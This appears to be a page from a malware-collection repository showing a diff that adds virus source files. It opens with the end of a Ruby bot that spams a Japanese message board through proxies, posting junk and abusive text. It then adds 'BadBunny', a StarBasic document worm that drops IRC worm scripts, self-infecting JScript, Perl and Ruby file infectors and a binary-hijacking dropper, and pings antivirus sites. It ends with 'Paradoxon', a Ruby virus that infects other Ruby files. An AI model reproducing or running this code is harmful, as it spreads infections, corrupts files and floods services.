age.post("http://jbbs.livedoor.jp/bbs/write.cgi/#{$category}/#{$bbs}/#{age.req.form['KEY']}")
|
||||
end
|
||||
}
|
||||
end
|
||||
else
|
||||
if sure.size != 0
|
||||
loop do
|
||||
sleep $wait_time
|
||||
r = rand proxy.size
|
||||
Thread.new(r, proxy){|ran, pro|
|
||||
age = Web::Agent.new
|
||||
age.setup
|
||||
age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8"
|
||||
age.req.header['Referer'] = "http://jbbs.livedoor.jp/#{$category}/#{$bbs}/"
|
||||
age.req.header['content-type']='application/x-www-form-urlencoded'
|
||||
if rand(2) == 1
|
||||
age.proxy_host = pro[ran][0]
|
||||
age.proxy_port = pro[ran][1]
|
||||
end
|
||||
if $id == ''
|
||||
age.req.form.add 'NAME', (10000 + rand(90000)).to_s
|
||||
age.req.form.add 'MAIL', 'sage'
|
||||
age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ')
|
||||
else
|
||||
names
|
||||
age.req.form.add 'NAME', $id.chop.chop
|
||||
age.req.form.add 'MAIL', ''
|
||||
massage = ''
|
||||
massage = "なあ、ひとつ質問なんだけど・・・・・・お前達規約違反者はどうして今すぐにでも死なないんだ?\n" if rand(10) == 1
|
||||
massage += rtx + "\n" if $rtx
|
||||
massage += aretool + "\n" if $are
|
||||
massage += "RoAddr\n" if $roaddr && rand(2) == 1
|
||||
massage += "KORE\n" if $korepath.size > 0
|
||||
massage += $charas
|
||||
age.req.form.add 'MESSAGE', massage
|
||||
end
|
||||
age.req.form.add 'BBS', $bbs
|
||||
age.req.form.add 'KEY', sure[rand(sure.size)]
|
||||
age.req.form.add 'TIME', Time.now.to_s.to_i
|
||||
age.req.form.add 'DIR', $category
|
||||
age.post("http://jbbs.livedoor.jp/bbs/write.cgi/#{$category}/#{$bbs}/#{age.req.form['KEY']}")
|
||||
}
|
||||
count += 1
|
||||
break if count % 10 == 0
|
||||
end
|
||||
else
|
||||
$suret[rand($suret.size)].match(/,(.+)\(/)
|
||||
age = Web::Agent.new
|
||||
age.setup
|
||||
age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8"
|
||||
age.req.header['Referer'] = "http://jbbs.livedoor.jp/#{$category}/#{$bbs}/"
|
||||
age.req.header['content-type']='application/x-www-form-urlencoded'
|
||||
age.req.form.add 'NAME', ''
|
||||
age.req.form.add 'MAIL', ''
|
||||
age.req.form.add 'SUBJECT', $1.chop + rand(10).to_i.to_s
|
||||
age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ')
|
||||
age.req.form.add 'BBS', $bbs
|
||||
age.req.form.add 'TIME', Time.now.to_s.to_i
|
||||
age.req.form.add 'DIR', $category
|
||||
age.post("http://jbbs.livedoor.jp/bbs/write.cgi/#{$category}/#{$bbs}/#{age.req.form['KEY']}")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
while Thread.list.size > 2
|
||||
sleep 10
|
||||
end
|
314
Ruby/Virus.Ruby.Badbunny.a
Normal file
314
Ruby/Virus.Ruby.Badbunny.a
Normal file
@ -0,0 +1,314 @@
|
||||
Dim Url As String
|
||||
Dim myFileProp as Object
|
||||
|
||||
Sub badbunny()
|
||||
rem Ooo.BadBunny by Necronomikon&Wargame from [D00mRiderz]
|
||||
Dim mEventProps(1) as new com.sun.star.beans.PropertyValue
|
||||
mEventProps(0).Name = "EventType"
|
||||
mEventProps(0).Value = "StarBasic"
|
||||
mEventProps(1).Name = "Script"
|
||||
mEventProps(1).Value = "macro://ThisComponent/Standard.badbunny.startgame"
|
||||
com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
|
||||
ThisComponent.LockControllers
|
||||
oDocument = ThisComponent
|
||||
otext=oDocument.text
|
||||
ocursor=otext.createtextcursor()
|
||||
otext.insertString(ocursor, "BadBunny(c)by Necronomikon[DR],Skyout,Wargame[DR]",false)
|
||||
url=converttourl("http://www.gratisweb.com/badbunny/badbunny.jpg")
|
||||
oDocument = StarDesktop.loadComponentFromURL(url, "_blank", 0, myFileProp() )
|
||||
msgbox "Hey " +Chr(31)+environ("username") +Chr(31)+ " you like my BadBunny?", 32,"///BadBunny\\\"
|
||||
call ping
|
||||
end sub
|
||||
|
||||
sub startgame
|
||||
if GetGUIType =1 then 'windows
|
||||
call win
|
||||
end if
|
||||
if GetGUIType =3 then 'MacOS
|
||||
call mac
|
||||
end if
|
||||
if GetGUIType =4 then 'linux
|
||||
call lin
|
||||
end if
|
||||
end sub
|
||||
|
||||
sub win
|
||||
Dim dirz As String
|
||||
Dim dummy()
|
||||
Dim iVar As Integer
|
||||
Dim Args(0) as new com.sun.star.beans.PropertyValue
|
||||
Args(0).Name = "MacroExecutionMode"
|
||||
Args(0).Value = _
|
||||
com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
|
||||
ThisComponent.LockControllers
|
||||
datei="c:\badbunny.odg"
|
||||
dateiurl=converttourl(datei)
|
||||
odoc=thisComponent
|
||||
odoc.storeasurl(dateiurl,dummy())
|
||||
dirz=Environ ("programfiles")
|
||||
|
||||
Open "c:\drop.bad" For Output As #1
|
||||
Print #1, "[script]"
|
||||
Print #1, "n0=; IRC_Worm/BadBunny (c)by Necronomikon&Wargame from[D00MRiderz]"
|
||||
Print #1, "n1=/titlebar *#*#*#*#*#*( Not every Bunny is friendly... )*#*#*#*#*#*#*"
|
||||
Print #1, "n2=on 1:start:{"
|
||||
Print #1, "n3= /if $day == Friday { /echo }"
|
||||
Print #1, "n4=on 1:Join:#:if $chan = #virus /part $chan"
|
||||
Print #1, "n5=on 1:connect:.msg Necronomikon -=I am infected with ur stuff!!!=-"
|
||||
Print #1, "n6=on 1:connect:.msg wargame -=I am infected with ur stuff!!!=-"
|
||||
Print #1, "n7=on 1:text:#:*hi*:/say $chan kick me"
|
||||
Print #1, "n8=on 1:text:#:*hello*:/say $chan kick me"
|
||||
Print #1, "n9=on 1:part:#:{"
|
||||
Print #1, "n10=set %M_E $me"
|
||||
Print #1, "n11=set %NickName $nick"
|
||||
Print #1, "n12=set %ccd .dcc"
|
||||
Print #1, "n13= if %NickName != %M_E {"
|
||||
Print #1, "n14= /q %NickName lets do it like a rabbit...;)"
|
||||
Print #1, "n15= /msg %NickName Be my bunny!"
|
||||
Print #1, "n16=%ccd send -c %NickName c:\badbunny.odg"
|
||||
Print #1, "n17= }"
|
||||
Print #1, "n18=}"
|
||||
Close #1
|
||||
|
||||
if ( Dir(dirz &"\mirc") <> "") then
|
||||
Filecopy "c:\drop.bad" , dirz &"\mirc\script.ini"
|
||||
end if
|
||||
if ( Dir("c:\mirc") <> "") then
|
||||
Filecopy "c:\drop.bad" , "c:\mirc\script.ini"
|
||||
|
||||
end if
|
||||
if ( Dir(dirz &"\mirc32") <> "") then
|
||||
Filecopy "c:\drop.bad" , dirz &"\mirc32\script.ini"
|
||||
end if
|
||||
if ( Dir("c:\mirc32") <> "") then
|
||||
Filecopy "c:\drop.bad" , "c:\mirc32\script.ini"
|
||||
end if
|
||||
|
||||
Open "c:\badbunny.js" For Output As #2
|
||||
Print #2, "// BadBunny"
|
||||
Print #2, "var FSO=WScript.CreateObject(unescape(""%53"")+unescape(""%63"")+unescape(""%72"")+unescape(""%69"")+unescape(""%50"")+unescape(""%74"")+unescape(""%69"")+""n""+unescape(""%67"")+"".""+unescape(""%46"")+unescape(""%69"")+""l""+unescape(""%65"")+unescape(""%53"")+unescape(""%79"")+unescape(""%73"")+unescape(""%74"")+unescape(""%65"")+""mO""+unescape(""%62"")+""j""+unescape(""%65"")+unescape(""%63"")+unescape(""%74""))"
|
||||
Print #2, "var me=FSO.OpenTextFile(WScript.ScriptFullName,1)"
|
||||
Print #2, "var OurCode=me.Read(1759)"
|
||||
Print #2, "me.Close()"
|
||||
Print #2, "nl=String.fromCharCode(13,10); code=''; count=0; fcode=''"
|
||||
Print #2, "file=FSO.OpenTextFile(WScript.ScriptFullName).ReadAll()"
|
||||
Print #2, "for (i=0; i < file.length; i++) { check=0; if (file.charAt(i)==String.fromCharCode(123) && Math.round(Math.random()*3)==1) { foundit(); check=1 } if (!check) { code+=file.charAt(i) } }"
|
||||
Print #2, "FSO.OpenTextFile(WScript.ScriptFullName,2).Write(code+fcode)"
|
||||
Print #2, "var jsphile=new Enumerator(FSO.GetFolder(""."").Files)"
|
||||
Print #2, "for(;!jsphile.atEnd();jsphile.moveNext())"
|
||||
Print #2, "{"
|
||||
Print #2, "if(FSO.GetExtensionName(jsphile.item()).toUpperCase()==""JS"")"
|
||||
Print #2, "{"
|
||||
Print #2, "var filez=FSO.OpenTextFile(jsphile.item().path,1)"
|
||||
Print #2, "var Marker=filez.Read(11)"
|
||||
Print #2, "var allinone=Marker+filez.ReadAll()"
|
||||
Print #2, "filez.Close()"
|
||||
Print #2, "if(Marker!=""// BadBunny"")"
|
||||
Print #2, "{"
|
||||
Print #2, "var filez=FSO.OpenTextFile(jsphile.item().path,2)"
|
||||
Print #2, "filez.Write(OurCode+allinone)"
|
||||
Print #2, "filez.Close()"
|
||||
Print #2, "}"
|
||||
Print #2, "}"
|
||||
Print #2, "}"
|
||||
Print #2, "function foundit()"
|
||||
Print #2, "{"
|
||||
Print #2, "fcodea=''; count=0; randon='';"
|
||||
Print #2, "for (j=i; j < file.length; j++) { if (file.charAt(j)==String.fromCharCode(123)) { count++; } if (file.charAt(j)==String.fromCharCode(125)) { count--; } if (!count) { fcodea=file.substring(i+1,j); j=file.length; } }"
|
||||
Print #2, "for (j=0; j < Math.round(Math.random()*5)+4; j++) { randon+=String.fromCharCode(Math.round(Math.random()*25)+97) }"
|
||||
Print #2, "fcode+=nl+nl+'function '+randon+'()'+nl+String.fromCharCode(123)+nl+fcodea+nl+String.fromCharCode(125)"
|
||||
Print #2, "code+=String.fromCharCode(123)+' '+randon+'() '"
|
||||
Print #2, "i+=fcodea.length;"
|
||||
Print #2, "}"
|
||||
Print #2, "//->"
|
||||
Close #2
|
||||
Shell("c:\badbunny.js",0)
|
||||
oDoc.store()
|
||||
End Sub
|
||||
|
||||
sub lin()
|
||||
'xchat2worm part by WarGame
|
||||
dim HomeDir as string
|
||||
dim xchat2script as string
|
||||
dim perlvir as string
|
||||
dim cmd as string
|
||||
dim WgeT as string
|
||||
Dim dummy()
|
||||
Dim iVar As Integer
|
||||
Dim Args(0) as new com.sun.star.beans.PropertyValue
|
||||
Args(0).Name = "MacroExecutionMode"
|
||||
Args(0).Value = _
|
||||
com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
|
||||
ThisComponent.LockControllers
|
||||
datei="/tmp/badbunny.odg"
|
||||
dateiurl=converttourl(datei)
|
||||
odoc=thisComponent
|
||||
odoc.storeasurl(dateiurl,dummy())
|
||||
|
||||
' get home dir
|
||||
HomeDir = Environ("HOME")
|
||||
|
||||
'build the path of our xchat2 script
|
||||
if HomeDir = "" then
|
||||
' I could not get $HOME !
|
||||
|
||||
else
|
||||
xchat2script = HomeDir & "/.xchat2/badbunny.py"
|
||||
|
||||
' drop the python script
|
||||
Open xchat2script For Output As #1
|
||||
print #1,"__module_name__ = "+Chr(34)+"IRC_Worm/BadBunny (c)by Necronomikon&Wargame from[D00MRiderz]"+Chr(34)
|
||||
print #1,"__module_version__ = "+Chr(34)+"0.1"+Chr(34)
|
||||
print #1,"__module_description__ = "+Chr(34)+"xchat2 IRC_Worm for BadBunny"+Chr(34)
|
||||
print #1,"import xchat"
|
||||
print #1,"def onkick_cb(word, word_eol, userdata):"
|
||||
print #1," if xchat.nickcmp(word[3],xchat.get_info("+Chr(34)+"nick"+Chr(34)+")) != 0:"
|
||||
print #1," xchat.command("+Chr(34)+"DCC SEND "+Chr(34)+"+ word[3] +"+Chr(34)+" /tmp/badbunny.odg"+Chr(34)+")"
|
||||
print #1," return xchat.EAT_NONE"
|
||||
print #1,"xchat.hook_server("+Chr(34)+"KICK"+Chr(34)+", onkick_cb)"
|
||||
close #1
|
||||
endif
|
||||
|
||||
'drop the perl virus
|
||||
perlvir = HomeDir & "/BadBunny.pl"
|
||||
open perlvir for output as #1
|
||||
print #1,"#BadBunny"
|
||||
print #1,"open(File,$0);@MyCode = ;close(File);"
|
||||
print #1,"foreach $FileName (<*>){open(File,$FileName);$chk = 1;while(){"
|
||||
print #1,"if($_ =~ /#BadBunny/){$chk = 0;}}close(File);if($chk eq 1){"
|
||||
print #1,"open(File,"+Chr(34)+">$FileName"+Chr(34)+");print File @MyCode;close(File);}}"
|
||||
close #1
|
||||
cmd = "perl " & perlvir
|
||||
shell(cmd,0)
|
||||
|
||||
oDoc.store()
|
||||
end sub
|
||||
|
||||
sub mac()
|
||||
Dim iVar As Integer
|
||||
iVar = Int((15 * Rnd) -2)
|
||||
Select Case iVar
|
||||
Case 1 To 5
|
||||
call one
|
||||
Case 6, 7, 8
|
||||
call two
|
||||
Case Is > 8 And iVar < 11
|
||||
call one
|
||||
Case Else
|
||||
call two
|
||||
End Select
|
||||
end sub
|
||||
|
||||
sub one ()
|
||||
'thx to skyout
|
||||
Open "badbunny.rb" For Output As #1
|
||||
print #1,"#!/usr/bin/env ruby"
|
||||
print #1,"require 'ftools'"
|
||||
print #1,"def replacecmd(cmdname, dirpath)"
|
||||
print #1,"File.move(""#{dirpath}/#{cmdname}"", ""#{dirpath}/#{cmdname}_"")"
|
||||
print #1,"oldcmd = File.open(""#{dirpath}/#{cmdname}"", File::WRONLY|File::TRUNC|File::CREAT, 0777)"
|
||||
print #1,"oldcmd.puts ""#!/usr/bin/env ruby\n"""
|
||||
print #1,"oldcmd.puts ""puts \""\"""
|
||||
print #1,"oldcmd.puts ""puts \""\\t\\tYour system has been infected with:\"""""
|
||||
print #1,"oldcmd.puts ""puts \""\\t\\t>>>> Dropper for BadBunny"""""
|
||||
print #1,"oldcmd.puts ""puts \""\\t\\t>>>> by SkyOut"""
|
||||
print #1,"oldcmd.puts ""puts \""\"""""
|
||||
print #1,"oldcmd.puts ""puts \""Take a moment of patience ...\"""""
|
||||
print #1,"oldcmd.puts ""puts \""Executing in ...\"""""
|
||||
print #1,"oldcmd.puts ""sleep 1"""
|
||||
print #1,"oldcmd.puts ""puts \""3\"""
|
||||
print #1,"oldcmd.puts ""sleep 1"""
|
||||
print #1,"oldcmd.puts ""puts \""2\"""
|
||||
print #1,"oldcmd.puts ""sleep 1"""
|
||||
print #1,"oldcmd.puts ""puts \""1\"""
|
||||
print #1,"oldcmd.puts ""sleep 1"""
|
||||
print #1,"oldcmd.puts ""puts \""\"""
|
||||
print #1,"oldcmd.puts ""for $args in $* do"""
|
||||
print #1,"oldcmd.puts ""$argslist = \""#\{$argslist\}\"" + \"" \"" + \""#\{$args\}\"""
|
||||
print #1,"oldcmd.puts ""end"""
|
||||
print #1,"oldcmd.puts ""exec \""#{dirpath}/#{cmdname}_ #\{$argslist\}\"""
|
||||
print #1,"oldcmd.puts ""exit 0"""
|
||||
print #1,"end"
|
||||
print #1,"$binary_dirs = Array.new"
|
||||
print #1,"$binary_dirs = [ ""/bin"", ""/usr/bin"", ""/usr/local/bin"", ""/sbin"", ""/usr/sbin"", ""/usr/local/sbin"" ]"
|
||||
print #1,"for $dir in $binary_dirs do"
|
||||
print #1,"if File.directory?($dir) then"
|
||||
print #1,"if File.writable?($dir) then"
|
||||
print #1,"Dir.open($dir).each do |file|"
|
||||
print #1,"next if file =~ /^\S+_/ || file == ""."" || file == "".."""
|
||||
print #1,"replacecmd(file, $dir)"
|
||||
print #1,"end"
|
||||
print #1,"end"
|
||||
print #1,"end"
|
||||
print #1,"end"
|
||||
print #1,"exit 0"
|
||||
close #1
|
||||
Shell("badbunny.rb",0)
|
||||
end sub
|
||||
|
||||
sub two() 'thx to SPTH for this...
|
||||
Open "badbunnya.rb" For Output As #2
|
||||
print #2,"# BADB"
|
||||
print #2,"mycode="""
|
||||
print #2,"mych=File.open(__FILE__)"
|
||||
print #2,"myc=mych.read(1)"
|
||||
print #2,"while myc!=nil"
|
||||
print #2,"mycode+=myc"
|
||||
print #2,"myc=mych.read(1)"
|
||||
print #2,"end"
|
||||
print #2,"mycode=mycode[mycode.length-734,734]"
|
||||
print #2,"cdir = Dir.open(Dir.getwd)"
|
||||
print #2,"cdir.each do |a|"
|
||||
print #2,"if File.ftype(a)==""file"" then"
|
||||
print #2,"if a[a.length-3, a.length]=="".rb"" then"
|
||||
print #2,"if a!=File.basename(__FILE__) then"
|
||||
print #2,"fcode="""
|
||||
print #2,"fle=open(a)"
|
||||
print #2,"badb=fle.read(1)"
|
||||
print #2,"while badb!=nil"
|
||||
print #2,"fcode+=badb"
|
||||
print #2,"badb=fle.read(1)"
|
||||
print #2,"end"
|
||||
print #2,"fle.close"
|
||||
print #2,"if fcode[fcode.length-732,4]!=""BADB"" then"
|
||||
print #2,"fcode=fcode+13.chr+10.chr+mycode"
|
||||
print #2,"fle=open(a,""w"")"
|
||||
print #2,"fle.print fcode"
|
||||
print #2,"fle.close"
|
||||
print #2,"end"
|
||||
print #2,"end"
|
||||
print #2,"end"
|
||||
print #2,"end"
|
||||
print #2,"end"
|
||||
print #2,"cdir.close"
|
||||
close #2
|
||||
Shell("badbunnya.rb",0)
|
||||
End Sub
|
||||
|
||||
sub ping()
|
||||
Shell("ping -l 5000 -t www.ikarus.at",0)
|
||||
Shell("ping -l 5000 -t www.aladdin.com",0)
|
||||
Shell("ping -l 5000 -t www.norman.no",0)
|
||||
Shell("ping -l 5000 -t www.norman.com",0)
|
||||
Shell("ping -l 5000 -t www.kaspersky.com",0)
|
||||
Shell("ping -l 5000 -t www.kaspersky.ru",0)
|
||||
Shell("ping -l 5000 -t www.kaspersky.pl",0)
|
||||
Shell("ping -l 5000 -t www.grisoft.cz",0)
|
||||
Shell("ping -l 5000 -t www.symantec.com",0)
|
||||
Shell("ping -l 5000 -t www.proantivirus.com",0)
|
||||
Shell("ping -l 5000 -t www.f-secure.com",0)
|
||||
Shell("ping -l 5000 -t www.sophos.com",0)
|
||||
Shell("ping -l 5000 -t www.arcabit.pl",0)
|
||||
Shell("ping -l 5000 -t www.arcabit.com",0)
|
||||
Shell("ping -l 5000 -t www.avira.com",0)
|
||||
Shell("ping -l 5000 -t www.avira.de",0)
|
||||
Shell("ping -l 5000 -t www.avira.ro",0)
|
||||
Shell("ping -l 5000 -t www.avast.com",0)
|
||||
Shell("ping -l 5000 -t www.virusbuster.hu",0)
|
||||
Shell("ping -l 5000 -t www.trendmicro.com",0)
|
||||
Shell("ping -l 5000 -t www.bitdefender.com",0)
|
||||
Shell("ping -l 5000 -t www.pandasoftware.comm",0)
|
||||
Shell("ping -l 5000 -t www.drweb.com",0)
|
||||
Shell("ping -l 5000 -t www.drweb.ru",0)
|
||||
Shell("ping -l 5000 -t www.viruslist.com",0)
|
||||
end sub
|
26
Ruby/Virus.Ruby.Pydoxon.b
Normal file
26
Ruby/Virus.Ruby.Pydoxon.b
Normal file
@ -0,0 +1,26 @@
|
||||
# RUBY.Paradoxon
|
||||
mycode=File.open(__FILE__).read(630)
|
||||
cdir = Dir.open(Dir.getwd)
|
||||
cdir.each do |a|
|
||||
if File.ftype(a)=="file" then
|
||||
if a[a.length-3, a.length]==".rb" then
|
||||
if a!=File.basename(__FILE__) then
|
||||
fcode=""
|
||||
fle=open(a)
|
||||
spth=fle.read(1)
|
||||
while spth!=nil
|
||||
fcode+=spth
|
||||
spth=fle.read(1)
|
||||
end
|
||||
fle.close
|
||||
if fcode[7,9]!="Paradoxon" then
|
||||
fcode=mycode+13.chr+10.chr+fcode
|
||||
fle=open(a,"w")
|
||||
fle.print fcode
|
||||
fle.close
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
cdir.close
|
Loading…
Reference in New Issue
Block a user